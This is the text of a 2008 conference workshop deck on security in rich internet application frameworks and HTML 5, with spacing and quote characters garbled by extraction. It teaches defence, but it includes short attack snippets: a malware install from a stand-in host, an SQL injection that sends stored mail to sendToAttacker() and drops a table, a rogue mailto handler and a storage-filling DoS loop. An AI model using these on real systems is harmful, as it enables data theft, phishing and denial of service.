advertisement

RIA And AJAX Security Workshop, Part 2

67 %
33 %
advertisement
Information about RIA And AJAX Security Workshop, Part 2
Technology

Published on October 20, 2008

Author: astamos

Source: slideshare.net

Description

This is Part 2 of the RIA and AJAX Security workshop at Web 2.0 Expo Europe. This part is about RIA security.
advertisement

RIA Security Workshop: Blurring the Line between Web and Desktop Security Alex Stamos David Thiel Justine Osborne iSEC Partners 21 October, 2008 Stamos, Thiel, Osborne (iSEC Partners) RIA and AJAX Security Workshop - Part 2 Web 2.0 Expo Europe 1 / 90

1 Introduction Who are we? What’s a RIA? Why use RIA? 2 RIA Frameworks Adobe AIR MS Silverlight Google Gears Y! BrowserPlus Mozilla Prism HTML 5 3 Attack Scenarios RIA vs OS RIA vs the web Stamos, Thiel, Osborne (iSEC Partners) RIA and AJAX Security Workshop - Part 2 Web 2.0 Expo Europe 2 / 90

Introduction What’s a RIA? What’s a RIA? “Rich Internet Applications” As with “Web 2.0”, ill-defined May contain some of the following ingredients: AJAXy Flashiness Local storage “Offline mode” Decoupling from the browser Access to lower level OS resources: sockets, hardware devices Appearance of a traditional desktop application Our research has shown a huge disparity in features and security design Stamos, Thiel, Osborne (iSEC Partners) RIA and AJAX Security Workshop - Part 2 Web 2.0 Expo Europe 3 / 90

Introduction What’s a RIA? What’s a RIA? Party like it’s 1997 Constantly updating content! Push technology! No more browsers! Stamos, Thiel, Osborne (iSEC Partners) RIA and AJAX Security Workshop - Part 2 Web 2.0 Expo Europe 4 / 90

Introduction Why use RIA? Why use a RIA? “Web 2.0” no longer gets you VC funding To increase responsiveness—distribute data stores between server and client Desktop integration—take advantage of OS UI functionality Never learned any real programming languages In short, web developers can now write full “desktop” apps. This could be good or bad. Stamos, Thiel, Osborne (iSEC Partners) RIA and AJAX Security Workshop - Part 2 Web 2.0 Expo Europe 5 / 90

Frameworks RIA Frameworks Adobe AIR Microsoft Silverlight Google Gears Yahoo! BrowserPlus— Mozilla Prism Stamos, Thiel, Osborne (iSEC Partners) RIA and AJAX Security Workshop - Part 2 Web 2.0 Expo Europe 6 / 90

Frameworks RIA Frameworks Fight! Stamos, Thiel, Osborne (iSEC Partners) RIA and AJAX Security Workshop - Part 2 Web 2.0 Expo Europe 7 / 90

Frameworks Adobe AIR Adobe AIR Quick Summary Runs disconnected  Standalone app  Privileged OS access  Can launch itself  Local data storage  Has an installer  Raw network sockets  Cross-domain XHR  Dedicated session management  Can talk to the calling DOM  IPC mechanisms  Proper SSL security  Stamos, Thiel, Osborne (iSEC Partners) RIA and AJAX Security Workshop - Part 2 Web 2.0 Expo Europe 8 / 90

Frameworks Adobe AIR Adobe AIR What is Adobe AIR? Full-featured desktop runtime based upon Adobe Flash technology Cross-browser, cross-platform Applications can be created with: Adobe Flex 3 Adobe Flash CS3 HTML and JS using free tools AIR intended to be more powerful than a browser-based RIA There is no sandbox around the application AIR apps run with the full powers of the user Stamos, Thiel, Osborne (iSEC Partners) RIA and AJAX Security Workshop - Part 2 Web 2.0 Expo Europe 9 / 90

Frameworks Adobe AIR Adobe AIR What is Adobe AIR? So it’s just like a Win32 program in the eyes of a security analyst? Um, not really Power of AIR is the “I” in “RIA” Can be invoked by browser with arguments, like ActiveX or Flash Has many native mechanisms for loading external content Highly likely that developers will utilize Internet content. That’s the point. Stamos, Thiel, Osborne (iSEC Partners) RIA and AJAX Security Workshop - Part 2 Web 2.0 Expo Europe 10 / 90

Frameworks Adobe AIR Adobe AIR What is Adobe AIR? AIR is best thought of as an ActiveX or Full Trust .Net analogue and not like Flash++ Code runs with full privileges, can install malware Native mechanisms allow for interaction with untrusted world Fortunately, Adobe has seemed to learn some lessons from ActiveX Stamos, Thiel, Osborne (iSEC Partners) RIA and AJAX Security Workshop - Part 2 Web 2.0 Expo Europe 11 / 90

Frameworks Adobe AIR Adobe AIR Adobe AIR Instantiation AIR Applications are identified by an appID and pubID pubID calculated from developer personal information and certificate SWF files can import functionality that allows them to interact with AIR applications. From Adobe: a i r S W F L o a d e r . l o a d ( new URLRequest ( quot; http :// airdownload . adobe . com / browserapi / air . swf quot; ) , loaderContext ) ; Stamos, Thiel, Osborne (iSEC Partners) RIA and AJAX Security Workshop - Part 2 Web 2.0 Expo Europe 12 / 90

Frameworks Adobe AIR Adobe AIR Adobe AIR Instantiation With airSWF classes, the SWF can check on the application’s install status and version airSWF . g e t A p p l i c a t i o n V e r s i o n ( appID , pubID , v e r s i o n D e t e c t C a l l b a c k ) ; Now that we know the version, we can instantiate airSWF . l a u n c h A p p l i c a t i o n ( appID , pubID , a r g u m e n t s ) ; Stamos, Thiel, Osborne (iSEC Partners) RIA and AJAX Security Workshop - Part 2 Web 2.0 Expo Europe 13 / 90

Frameworks Adobe AIR Adobe AIR Adobe AIR Security Model By default, code included in AIR application has full rights New functionality in privileged APIs added to JavaScript and ActionScript Some restrictions on interacting with desktop in AIR 1.0 Existing capabilities can be chained to run native code Rumors of additional native code capabilities in future releases Stamos, Thiel, Osborne (iSEC Partners) RIA and AJAX Security Workshop - Part 2 Web 2.0 Expo Europe 14 / 90

Frameworks Adobe AIR Adobe AIR Adobe AIR Security Model No “code access security” model as understood on other systems, such as Java or .Net Instead, five pre-defined sandboxes with fixed capabilities Application — Full perms. Default for code included with AIR app Remote — Code downloaded from internet. Browser-like permissions Three intermediate permissions for local SWFs Stamos, Thiel, Osborne (iSEC Partners) RIA and AJAX Security Workshop - Part 2 Web 2.0 Expo Europe 15 / 90

Frameworks Adobe AIR Adobe AIR Adobe AIR Security Model AIR has many ways of loading executable content to run, such as HTML/JS and SWFs Also many ways of getting external untrusted data Network traffic Arguments from browser invocation Command line arguments Application Sandbox Is not supposed to be able to dynamically generate code eval() is best example in JS Goal is to eliminate XSS and injection attacks that have plagued Flash apps that have more kick with local privileges Stamos, Thiel, Osborne (iSEC Partners) RIA and AJAX Security Workshop - Part 2 Web 2.0 Expo Europe 16 / 90

Frameworks Adobe AIR Adobe AIR Adobe AIR Security Model Default for remotely loaded code is Remote sandbox Cannot access new dangerous classes, like FileStream() Can access eval() and other dynamic methods Can be granted cross-domain XHR Should be sufficient for most of the content developers would want from Internet, such as HTML or movie SWFs Stamos, Thiel, Osborne (iSEC Partners) RIA and AJAX Security Workshop - Part 2 Web 2.0 Expo Europe 17 / 90

Frameworks Adobe AIR Adobe AIR Adobe AIR Security Model Seems like a reasonable security precaution. How will web developers circumvent it? They can look for mistakes in Adobe’s classification of methods Better yet, use a Sandbox Bridge Official method of moving data between sandboxes An application can attach functions or variables to an object available from multiple sandboxes Documented as passing by value, not reference, although this doesn’t jive with how functions work Stamos, Thiel, Osborne (iSEC Partners) RIA and AJAX Security Workshop - Part 2 Web 2.0 Expo Europe 18 / 90

Frameworks Adobe AIR Adobe AIR Adobe AIR Security Model First parent sets up Sandbox Bridge v a r h i g h R i g h t s S t u f f = {}; h i g h R i g h t s S t u f f . w r i t e T o F i l e = f u n c t i o n ( name , c o n t e n t ) { // W r i t e t o f i l e w i t h a i r . F i l e S t r e a m } document . g e t E l e m e n t B y I d ( quot; child quot; ) . contentWindow . p a r e n t S a n d b o x B r i d g e = highRightsStuff ; Then child code (in a iFrame) can access the function window . p a r e n t S a n d b o x B r i d g e . w r i t e T o F i l e ( name , c o n t e n t ) ; Stamos, Thiel, Osborne (iSEC Partners) RIA and AJAX Security Workshop - Part 2 Web 2.0 Expo Europe 19 / 90

Frameworks Adobe AIR Adobe AIR Installing AIR AIR requires Flash 9 Can be installed via external binary or inside of Flash: Stamos, Thiel, Osborne (iSEC Partners) RIA and AJAX Security Workshop - Part 2 Web 2.0 Expo Europe 20 / 90

Frameworks Adobe AIR Adobe AIR Installing an AIR Application AIR applications can be bundled as binaries (*.air) Can also be installed by a web page from inside a SWF v a r u r l : S t r i n g = quot; http :// www . cybervillains . com / malware . air quot; ; v a r r u n t i m e V e r s i o n : S t r i n g = quot; 1.0 quot; ; v a r a r g u m e n t s : A r r a y = [ quot; l aun chF rom Brow ser quot; ] ; airSWF . i n s t a l l A p p l i c a t i o n ( u r l , r u n t i m e V e r s i o n , a r g u m e n t s ) ; Creates an Open/Save prompt Stamos, Thiel, Osborne (iSEC Partners) RIA and AJAX Security Workshop - Part 2 Web 2.0 Expo Europe 21 / 90

Frameworks Adobe AIR Adobe AIR Installing an AIR Application Adobe supports signing AIR applications with commercial certificates Gives you this prompt: Notice the default selection Stamos, Thiel, Osborne (iSEC Partners) RIA and AJAX Security Workshop - Part 2 Web 2.0 Expo Europe 22 / 90

Frameworks Adobe AIR Adobe AIR Installing an AIR Application Unfortunately, they also support self-signed certificates Gives you this prompt: Stamos, Thiel, Osborne (iSEC Partners) RIA and AJAX Security Workshop - Part 2 Web 2.0 Expo Europe 23 / 90

Frameworks Adobe AIR Adobe AIR Installing an AIR Application Actually, looks more like pre-IE7 ActiveX What am I complaining about? They give the correct information True, but so did ActiveX Allowing users to install signed applets is dangerous enough Allowing self-signed (which is same as unsigned) is terrifying The popularity of ActiveX in IE5 and IE6 and the ability of web sites to pop open infinite prompts made it the premier malware seeding mechanism Adobe Flash is more popular than IE ever was It’s almost impossible to install ActiveX now. That’s not an accident. Stamos, Thiel, Osborne (iSEC Partners) RIA and AJAX Security Workshop - Part 2 Web 2.0 Expo Europe 24 / 90

Frameworks Adobe AIR Adobe AIR Installing an AIR Application Some suggestions Change default action Add a countdown timer to discourage mindless clickthrough There is already a registry key to disable unsigned install prompts, turn it on by default Stop distributing self-signed AIR applications from Adobe.com There is perhaps room for something between AIR and Flash without the rootkit abilities Stamos, Thiel, Osborne (iSEC Partners) RIA and AJAX Security Workshop - Part 2 Web 2.0 Expo Europe 25 / 90

Frameworks MS Silverlight Questions about Silverlight Runs disconnected  Standalone app  Privileged OS access  Can launch itself  Local data storage  Has an installer  Raw network sockets  Cross-domain XHR  Dedicated session management  Can talk to the calling DOM  IPC mechanisms  Proper SSL security  Stamos, Thiel, Osborne (iSEC Partners) RIA and AJAX Security Workshop - Part 2 Web 2.0 Expo Europe 26 / 90

Frameworks MS Silverlight Microsoft Silverlight What is Silverlight? What is Silverlight? Cross browser plugin comparable in functionality to Flash Subset of the .NET framework Two versions: Silverlight 1.0: released Silverlight 2.0: beta 2 Stamos, Thiel, Osborne (iSEC Partners) RIA and AJAX Security Workshop - Part 2 Web 2.0 Expo Europe 27 / 90

Frameworks MS Silverlight Microsoft Silverlight What is Silverlight? Silverlight Bits .XAP .ZIP container for Silverlight apps XAML Extensible Application Markup Language CoreCLR CLR for .NET lite (with enhanced CAS) XBAP XAML Browser Applications (CAS) Stamos, Thiel, Osborne (iSEC Partners) RIA and AJAX Security Workshop - Part 2 Web 2.0 Expo Europe 28 / 90

Frameworks MS Silverlight Microsoft Silverlight XAML <Canvas Width=quot; 600 quot; H e i g h t=quot; 500 quot; Background=quot; AntiqueWhite quot; x m l n s=quot; http :// schemas . microsoft . com / client /2007 quot; x m l n s : x=quot; http :// schemas . microsoft . com / winfx /2006/ xaml quot;> <S t a c k P a n e l Width=quot; 600 quot;> <Image S o u r c e=quot; plan . jpg quot; /> <S t a c k P a n e l O r i e n t a t i o n=quot; Horizontal quot;> <T e x t B l o c k H e i g h t=quot; 45 quot; F o n t S i z e=quot; 18 quot;>B i g g e r Cat</T e x t B l o c k> <S l i d e r V a l u e=quot; 2 quot; Minimum=quot; 1 quot; Maximum=quot; 10 quot; H e i g h t=quot; 45 quot; Width=quot; 400 quot; H o r i z o n t a l A l i g n m e n t=quot; Center quot; V e r t i c a l A l i g n m e n t=quot; Bottom quot;></S l i d e r > <T e x t B l o c k F o n t S i z e=quot; 18 quot; H e i g h t=quot; 45 quot;>S m a l l e r Cat</T e x t B l o c k> </S t a c k P a n e l> </S t a c k P a n e l> </Canvas> Stamos, Thiel, Osborne (iSEC Partners) RIA and AJAX Security Workshop - Part 2 Web 2.0 Expo Europe 29 / 90

Frameworks MS Silverlight Microsoft Silverlight XAML in Action Stamos, Thiel, Osborne (iSEC Partners) RIA and AJAX Security Workshop - Part 2 Web 2.0 Expo Europe 30 / 90

Frameworks MS Silverlight Microsoft Silverlight Silverlight Security Model Silverlight’s Simplified Code Access Security SecurityTransparent—Silverlight developer code, sans attribute SecuritySafeCritical—New bridge code from Microsoft SecurityCritical—Slimmed .NET 3 Stamos, Thiel, Osborne (iSEC Partners) RIA and AJAX Security Workshop - Part 2 Web 2.0 Expo Europe 31 / 90

Frameworks MS Silverlight Microsoft Silverlight Isolated Storage This code will silently fail: u s i n g System . IO ; This code will succeed: u s i n g System . IO ; IsolatedStorageFile i s f = IsolatedStorageFile . GetUserStoreForApplication () ; i s f . C r e a t e F i l e ( quot; relativePath quot; ) ; Stamos, Thiel, Osborne (iSEC Partners) RIA and AJAX Security Workshop - Part 2 Web 2.0 Expo Europe 32 / 90

Frameworks MS Silverlight Microsoft Silverlight Isolated Storage What could go wrong? SecuritySafeCritical code fails us (Microsoft’s fault) Threading DoS attacks against local system Stamos, Thiel, Osborne (iSEC Partners) RIA and AJAX Security Workshop - Part 2 Web 2.0 Expo Europe 33 / 90

Frameworks MS Silverlight Microsoft Silverlight Isolated Storage Isolated Storage The default storage quota is 1 MB per application Two applications cannot access eachothers storage Storage is isolated based on AppDomain Stamos, Thiel, Osborne (iSEC Partners) RIA and AJAX Security Workshop - Part 2 Web 2.0 Expo Europe 34 / 90

Frameworks MS Silverlight Silverlight Security File System What could go wrong? DoS against the user Sensitive File names like COM3 and prn Stamos, Thiel, Osborne (iSEC Partners) RIA and AJAX Security Workshop - Part 2 Web 2.0 Expo Europe 35 / 90

Frameworks MS Silverlight Silverlight Security File System You can deny local storage Stamos, Thiel, Osborne (iSEC Partners) RIA and AJAX Security Workshop - Part 2 Web 2.0 Expo Europe 36 / 90

Frameworks MS Silverlight Interaction with the Operating System Network Sockets Network sockets are available to the Silverlight applications through the System.Net.Sockets namespace Currently only supports TCP sockets Socket connections can only push data to the client Socket connections require clientaccesspolicy.xml (even to host of origin) served from port 943 Stamos, Thiel, Osborne (iSEC Partners) RIA and AJAX Security Workshop - Part 2 Web 2.0 Expo Europe 37 / 90

Frameworks MS Silverlight Interaction with the Operating System Network Sockets What could go wrong? More DoS Policy file requests Stamos, Thiel, Osborne (iSEC Partners) RIA and AJAX Security Workshop - Part 2 Web 2.0 Expo Europe 38 / 90

Frameworks MS Silverlight Cross-domain Access initParams issues, XSS, insecure inclusion, HTML bridge Breaking the same orgin policy with files Cross domain issues, CSRF, web serivces architecture: <?xml v e r s i o n=quot; 1.0 quot; e n c o d i n g=quot; utf -8 quot;?> <a c c e s s −p o l i c y > <c r o s s −domain−a c c e s s > <p o l i c y > <a l l o w−from h t t p−r e q u e s t −h e a d e r s=quot; * quot;> <domain u r i=quot; * quot;/> </a l l o w−from> <g r a n t−to> <r e s o u r c e p a t h=quot; / quot; i n c l u d e −s u b p a t h s=quot; true quot;/> </g r a n t−to> </ p o l i c y > </c r o s s −domain−a c c e s s > </a c c e s s −p o l i c y > Stamos, Thiel, Osborne (iSEC Partners) RIA and AJAX Security Workshop - Part 2 Web 2.0 Expo Europe 39 / 90

Frameworks Google Gears Questions about Gears Runs disconnected  Standalone app  Privileged OS access  Can launch itself  Local data storage  Has an installer  Raw network sockets  Cross-domain XHR  Dedicated session management  Can talk to the calling DOM  IPC mechanisms  Proper SSL security  Stamos, Thiel, Osborne (iSEC Partners) RIA and AJAX Security Workshop - Part 2 Web 2.0 Expo Europe 40 / 90

Frameworks Google Gears Google Gears Uses a homegrown API for synchronizing data Local SQLite instance used for data storage LocalServer hosts content locally for offline access Works offline via SQL database, local assets, and a local app server, LocalServer LocalServer acts as a broker between the browser and webserver Changes behavior depending on online status Implements a WorkerPool to perform intensive Javascript calculations outside of the browser Stamos, Thiel, Osborne (iSEC Partners) RIA and AJAX Security Workshop - Part 2 Web 2.0 Expo Europe 41 / 90

Frameworks Google Gears Google Gears Security mechanisms Uses same origin to restrict access to site databases and LocalServer resource capture Provides for parameterized SQL Opt-in user dialog Gears 0.3 allows for “customization” of this dialog. . . Stamos, Thiel, Osborne (iSEC Partners) RIA and AJAX Security Workshop - Part 2 Web 2.0 Expo Europe 42 / 90

Frameworks Google Gears Google Gears Not a great “feature”. . . Stamos, Thiel, Osborne (iSEC Partners) RIA and AJAX Security Workshop - Part 2 Web 2.0 Expo Europe 43 / 90

Frameworks Google Gears Google Gears Workerpool botnets Workerpools allow for intensive tasks that would normally trigger tight loop detection to run uninterrupted Due to the ease of tricking users into installing Gears apps, makes an attractive target for botnets Applications for hash cracking, remote site attacks Stamos, Thiel, Osborne (iSEC Partners) RIA and AJAX Security Workshop - Part 2 Web 2.0 Expo Europe 44 / 90

Frameworks Y! BrowserPlus Questions about Yahoo! BrowserPlus— Runs disconnected  Standalone app  Privileged OS access  Can launch itself  Local data storage  Has an installer  Raw network sockets  Cross-domain XHR  Dedicated session management  Can talk to the calling DOM  IPC mechanisms  Proper SSL security  Stamos, Thiel, Osborne (iSEC Partners) RIA and AJAX Security Workshop - Part 2 Web 2.0 Expo Europe 45 / 90

Frameworks Y! BrowserPlus Yahoo! BrowserPlus— A challenger appear “To address security, we’ve followed the same web security precedent set by browser developers.” But it’s even worse than that. . . Initialized by including http://bp.yahooapis.com/2.0.6/browserplus-min.js No, you can’t do that over SSL Stamos, Thiel, Osborne (iSEC Partners) RIA and AJAX Security Workshop - Part 2 Web 2.0 Expo Europe 46 / 90

Frameworks Y! BrowserPlus Yahoo! BrowserPlus— Architecture Runs as a browser plugin, with a separate helper process Allows pages to request handy “corelets”, installed on-demand, like: Imagemagick for local image processing Flickr uploadr Notifications via Growl/Snarl and a Ruby interpreter” These execute code on the local machine as the current user In short, it’s ActiveX−− Stamos, Thiel, Osborne (iSEC Partners) RIA and AJAX Security Workshop - Part 2 Web 2.0 Expo Europe 47 / 90

Frameworks Y! BrowserPlus Yahoo! BrowserPlus— About this Ruby business. . . Included version: 1.8.6p0 Perfectly safe, as long as you don’t use strings or arrays Stamos, Thiel, Osborne (iSEC Partners) RIA and AJAX Security Workshop - Part 2 Web 2.0 Expo Europe 48 / 90

Frameworks Y! BrowserPlus Yahoo! BrowserPlus— Of course, BrowserPlus— isn’t totally baked yet In “Sneak Peek” phase Currently, only works with Yahoo! sites All modules must be signed by Yahoo! Also lacks some “polish”. . . <s p a n c l a s s=quot; description quot;> A d e s c r i p t i o n o f t h e componennt ooga booga momma b i t e me y e a h y e a h y e a h . ↑ Actual Yahoo! content Stamos, Thiel, Osborne (iSEC Partners) RIA and AJAX Security Workshop - Part 2 Web 2.0 Expo Europe 49 / 90

Frameworks Y! BrowserPlus Yahoo! BrowserPlus— Summary This is a bad idea. Allows for buggy native code apps of any type to be deployed with no sandboxing or sitelocking. All runs as a browser plugin rather than an extension or control: full privilege. Corelets are signed, but can overwrite each other after signature verification (and be updated dynamically) Bad code can supposedly be revoked, but it can override revocation mechanisms. Bottom line—can’t ship in current state Stamos, Thiel, Osborne (iSEC Partners) RIA and AJAX Security Workshop - Part 2 Web 2.0 Expo Europe 50 / 90

Frameworks Mozilla Prism Mozilla Prism Quick Summary Runs disconnected  Standalone app  Privileged OS access  Can launch itself  Local data storage  Has an installer  Raw network sockets  Cross-domain XHR  Dedicated session management  Can talk to the calling DOM  IPC mechanisms  Proper SSL security  Stamos, Thiel, Osborne (iSEC Partners) RIA and AJAX Security Workshop - Part 2 Web 2.0 Expo Europe 51 / 90

Frameworks Mozilla Prism Mozilla Prism Formerly WebRunner—wraps webapps to appear as desktop apps “Standalone” browser instance, restricted to one domain External links open a regular browser Separate user profile Certificate errors are a hard failure Stamos, Thiel, Osborne (iSEC Partners) RIA and AJAX Security Workshop - Part 2 Web 2.0 Expo Europe 52 / 90

Frameworks Mozilla Prism Mozilla Prism Consists of a webapp bundle with id, URI, CSS, scripting and UI rules in an INI: [ Parameters ] i d=i s e c . s i t e @ i s e c p a r t n e r s . com u r i=h t t p s : / /www . i s e c p a r t n e r s . com/ i c o n=i s e c s t a t u s=no l o c a t i o n=no s i d e b a r=no n a v i g a t i o n=no Stamos, Thiel, Osborne (iSEC Partners) RIA and AJAX Security Workshop - Part 2 Web 2.0 Expo Europe 53 / 90

Frameworks Mozilla Prism Mozilla Prism Example bundles Stamos, Thiel, Osborne (iSEC Partners) RIA and AJAX Security Workshop - Part 2 Web 2.0 Expo Europe 54 / 90

Frameworks Mozilla Prism Mozilla Prism Bundles Javascript included with webapp bundles has full XPCOM privs (but not content scripting privs) Script in 3rd-party bundles allows modifying browser behavior just like an extension Unlike add-ons, no mechanism for signing or verifying goodness of webapp bundles Stamos, Thiel, Osborne (iSEC Partners) RIA and AJAX Security Workshop - Part 2 Web 2.0 Expo Europe 55 / 90

Frameworks Mozilla Prism Mozilla Prism Prism Install UI Stamos, Thiel, Osborne (iSEC Partners) RIA and AJAX Security Workshop - Part 2 Web 2.0 Expo Europe 56 / 90

Frameworks Mozilla Prism Mozilla Prism Abuse Looks like a bookmark dialog No warnings for install Full XPCOM scripting privileges Low bar for trojans and malicious code—a malicious browser extension, but with no code signing or warning Stamos, Thiel, Osborne (iSEC Partners) RIA and AJAX Security Workshop - Part 2 Web 2.0 Expo Europe 57 / 90

Frameworks Mozilla Prism Mozilla Prism Abuse Not only that, but the sandboxing isn’t real Prism apps can script all kinds of things In 0.8, a malicious Prism app can change preferences affecting all other Prism apps . . . like proxy configuration, for example. . . oops. Stamos, Thiel, Osborne (iSEC Partners) RIA and AJAX Security Workshop - Part 2 Web 2.0 Expo Europe 58 / 90

Frameworks HTML 5 HTML 5 New “features” in Firefox and WebKit Introduces DOM storage—sessionStorage and localStorage sessionStorage stores arbitrary amounts of data for a single session localStorage persists beyond the session — never expires, limited to 5M Database storage via openDatabase() All expected to be same-origin Stamos, Thiel, Osborne (iSEC Partners) RIA and AJAX Security Workshop - Part 2 Web 2.0 Expo Europe 59 / 90

Frameworks HTML 5 DOM Storage The major goals of DOM storage—more storage space and real persistence Cookies considered too small Users delete cookies, or won’t accept them DOM storage bypasses pesky users However, pesky users can use: about:config dom.storage.enabled = false Stamos, Thiel, Osborne (iSEC Partners) RIA and AJAX Security Workshop - Part 2 Web 2.0 Expo Europe 60 / 90

Frameworks HTML 5 Browser-based SQL Databases DatabaseJacking Injection attacks become far more damaging when you can insert code like this: v a r db=o p e n D a t a b a s e ( quot;e - mail quot; , [ ] , quot; My precious e - mail quot; , quot; 3.14 quot; ) ; a l l m e s s a g e s=db . e x e c u t e S q l ( quot; SELECT * FROM MSGS quot; , [ ] , function ( results ) { sendToAttacker ( r e s u l t s ) ; } ); db . e x e c u t e S q l ( quot; DROP TABLE MESSAGES quot; , [ ] , function () { a l e r t ( quot; lol quot; ) ; } ); Stamos, Thiel, Osborne (iSEC Partners) RIA and AJAX Security Workshop - Part 2 Web 2.0 Expo Europe 61 / 90

Frameworks HTML 5 Firefox 3 Mozilla-specific issues Cross-Site XMLHttpRequest—removed in late FF3 betas, but it may return globalStorage FF2 has weak same-origin restrictions FF2 and FF3 both omit any UI to view/change/delete Deprecated in HTML 5 for localStorage The RIA world is totally SQL-happy Downloads, cookies, form history, search history, etc, all stored in local SQLite databases Why?? This data isn’t relational. Stamos, Thiel, Osborne (iSEC Partners) RIA and AJAX Security Workshop - Part 2 Web 2.0 Expo Europe 62 / 90

Frameworks HTML 5 Firefox 3 Additional fun Speaking of tracking and data storage. . . Did you have History turned off? FF3 may have turned it back on. Also new in FF3: nsIdleService—idle tracking through XPCOM EXSLT—eXtensible Stylesheet Language Transformations weren’t extensible enough, so here are the extensions. Thankfully, XSLT has been bug-free. Websites can now be protocol handlers—a novel way to implement spyware Stamos, Thiel, Osborne (iSEC Partners) RIA and AJAX Security Workshop - Part 2 Web 2.0 Expo Europe 63 / 90

Frameworks HTML 5 Firefox 3 Protocol Handlers Set up a dumb proxy, forwarding traffic to the real handler IP (and rewriting Host: headers) Register a new protocol handler thusly: <s c r i p t t y p e = ‘ ‘ t e x t / j a v a s c r i p t ’ ’> n a v i g a t o r . r e g i s t e r P r o t o c o l H a n d l e r ( ‘ ‘ m a i l t o ’ ’ , ‘ ‘ h t t p : / / 1 2 3 . 1 4 2 . 1 2 0 . 1 2 9 : 8 0 8 0 / dc / l a u n c h ? a c t i o n=compose&To=%s ’ ’ , ‘ ‘ Yahoo ! M a i l ’ ’ ) ; </ s c r i p t> Use your malicious IP instead of a name, users won’t know the difference The only “security” restriction is that the handler has to go to the domain trying to install it. Stamos, Thiel, Osborne (iSEC Partners) RIA and AJAX Security Workshop - Part 2 Web 2.0 Expo Europe 64 / 90

Frameworks HTML 5 Firefox 3 Protocol handler registration Installation of a protocol handler is one-click—only one option. Stamos, Thiel, Osborne (iSEC Partners) RIA and AJAX Security Workshop - Part 2 Web 2.0 Expo Europe 65 / 90

Frameworks HTML 5 Firefox 3 Launching a malicious handler After a handler is installed, mailto: links offer the malicious handler Note nearly invisible host URI and the auto-fetched favicon—which would you pick in a hurry? Stamos, Thiel, Osborne (iSEC Partners) RIA and AJAX Security Workshop - Part 2 Web 2.0 Expo Europe 66 / 90

Frameworks HTML 5 Webkit The Lurking Menace Used in Safari, iPhone, Nokia, Android, OpenMoko, Konqueror, and AIR Supports HTML 5 DOM storage mechanisms Early adopter of local database objects Particularly crucial on mobile devices, where storage is at a premium Stamos, Thiel, Osborne (iSEC Partners) RIA and AJAX Security Workshop - Part 2 Web 2.0 Expo Europe 67 / 90

Frameworks HTML 5 Inherent DoS Risks in HTML 5 5M per origin for database objects 5M per origin for localStorage 5M per origin for globalStorage (in Firefox) Thankfully, no one has hundreds of thousands of origins Except people on internal class A networks Or anyone with wildcard DNS Trivial storage exhaustion attacks possible Even more so for mobile devices based on WebKit—plus, storage and RAM are often pooled on these Almost no exposed UI to disable this Stamos, Thiel, Osborne (iSEC Partners) RIA and AJAX Security Workshop - Part 2 Web 2.0 Expo Europe 68 / 90

Frameworks HTML 5 DoS Risks in HTML 5 Attack Scenarios Attacker sets up or compromises web server with wildcard DNS Upon page visitation of the main virtual host, an IFRAME loads which runs Javascript like this: f u n c t i o n s t o r e t h i n g s ( name ) { g l o b a l S t o r a g e [ ’ cybervillains . org ’ ] [ name ] = quot; Hi there , from iSEC ! quot; ; } f u n c t i o n mul0 ( s t r , num ) { i f ( ! num ) r e t u r n quot; quot; ; v a r newStr = s t r ; w h i l e (−−num ) n e w S t r += s t r ; r e t u r n newStr ; } var i = 0; w h i l e ( i < 10000) { whee = mul0 ( quot; A quot; , 1 0 0 0 0 ) ; s t o r e t h i n g s ( whee + i ) ; i ++; } Stamos, Thiel, Osborne (iSEC Partners) RIA and AJAX Security Workshop - Part 2 Web 2.0 Expo Europe 69 / 90

Frameworks HTML 5 DoS Risks in HTML 5 Attack Scenarios Each request loads a page instantiating globalStorage and/or localStorage and database objects Fill the victim’s hard drive with incriminating evidence— base64-encoded images/files, etc. . . Stamos, Thiel, Osborne (iSEC Partners) RIA and AJAX Security Workshop - Part 2 Web 2.0 Expo Europe 70 / 90

Frameworks HTML 5 Other HTML 5 features not yet implemented Coming soon to a browser near you TCP Connections! Direct ones and broadcast. HTML 5 Specification Draft, Section 7.3.8, Security: “Need to write this section.” [3] Yes. Stamos, Thiel, Osborne (iSEC Partners) RIA and AJAX Security Workshop - Part 2 Web 2.0 Expo Europe 71 / 90

Attack Scenarios RIA vs OS RIA vs OS Storage All of these frameworks expand the capabilities to store data locally Introduce privacy/tracking concerns DoS risk against desktops and mobile devices Stamos, Thiel, Osborne (iSEC Partners) RIA and AJAX Security Workshop - Part 2 Web 2.0 Expo Europe 72 / 90

Attack Scenarios RIA vs OS RIA vs OS Malware Adobe AIR is a desktop application framework AIR can easily seed malware The effectiveness of malware attacks will be directly related to the popularity of the platform and the ease of install Large media attack surfaces pose another option Stamos, Thiel, Osborne (iSEC Partners) RIA and AJAX Security Workshop - Part 2 Web 2.0 Expo Europe 73 / 90

Attack Scenarios RIA vs the web RIA vs the web Or vice versa Most RIA frameworks and HTML 5 include mechanisms for SQL-based storage XSS now has access to huge, easily retrievable data stores, often pre-login Retrieving query parameters from untrusted sources can now leads to SQL injection CSRF from the RIA app to the browser usually still possible Silverlight and AIR accept input from calling sites, opening Flash-like XSS and XSF vulns Stamos, Thiel, Osborne (iSEC Partners) RIA and AJAX Security Workshop - Part 2 Web 2.0 Expo Europe 74 / 90

Attack Scenarios RIA vs RIA RIA vs RIA In the case of Prism, “sandboxed” apps can affect each other, and the browser In the case of BrowserPlus— , modules can clobber each other and other parts of the machine Done improperly, multiple frameworks allow for “bridging” apps, breaking outside of the sandbox Prism allows for developer foot-shooting by letting web pages talk to Chrome[4] Stamos, Thiel, Osborne (iSEC Partners) RIA and AJAX Security Workshop - Part 2 Web 2.0 Expo Europe 75 / 90

Security Checklist RIA Developers RIA Developer Checklist Prevent predictably named data stores—use a per-user GUID embedded in dynamically generated page Parameterize SQL statements Lock your app to your domain if possible Beware of passed-in arguments. Don’t use them in JavaScript or to fetch URLs Be very careful with sandbox bridging. Don’t get cute about bypassing AIR security model or crossing Mozilla unprivileged/unprivileged code boundaries Use Flex or Flash if you don’t need local power of AIR . . . and you probably don’t Stamos, Thiel, Osborne (iSEC Partners) RIA and AJAX Security Workshop - Part 2 Web 2.0 Expo Europe 76 / 90

Security Checklist RIA Framework Vendors RIA Framework Vendors Local Storage Security Let users opt out. User choice is missing here Cookies have been opt-out for ages, but other tracking mechanisms haven’t caught up Limit storage invocations 5M per origin is way too much without user interaction, especially on mobile devices Stamos, Thiel, Osborne (iSEC Partners) RIA and AJAX Security Workshop - Part 2 Web 2.0 Expo Europe 77 / 90

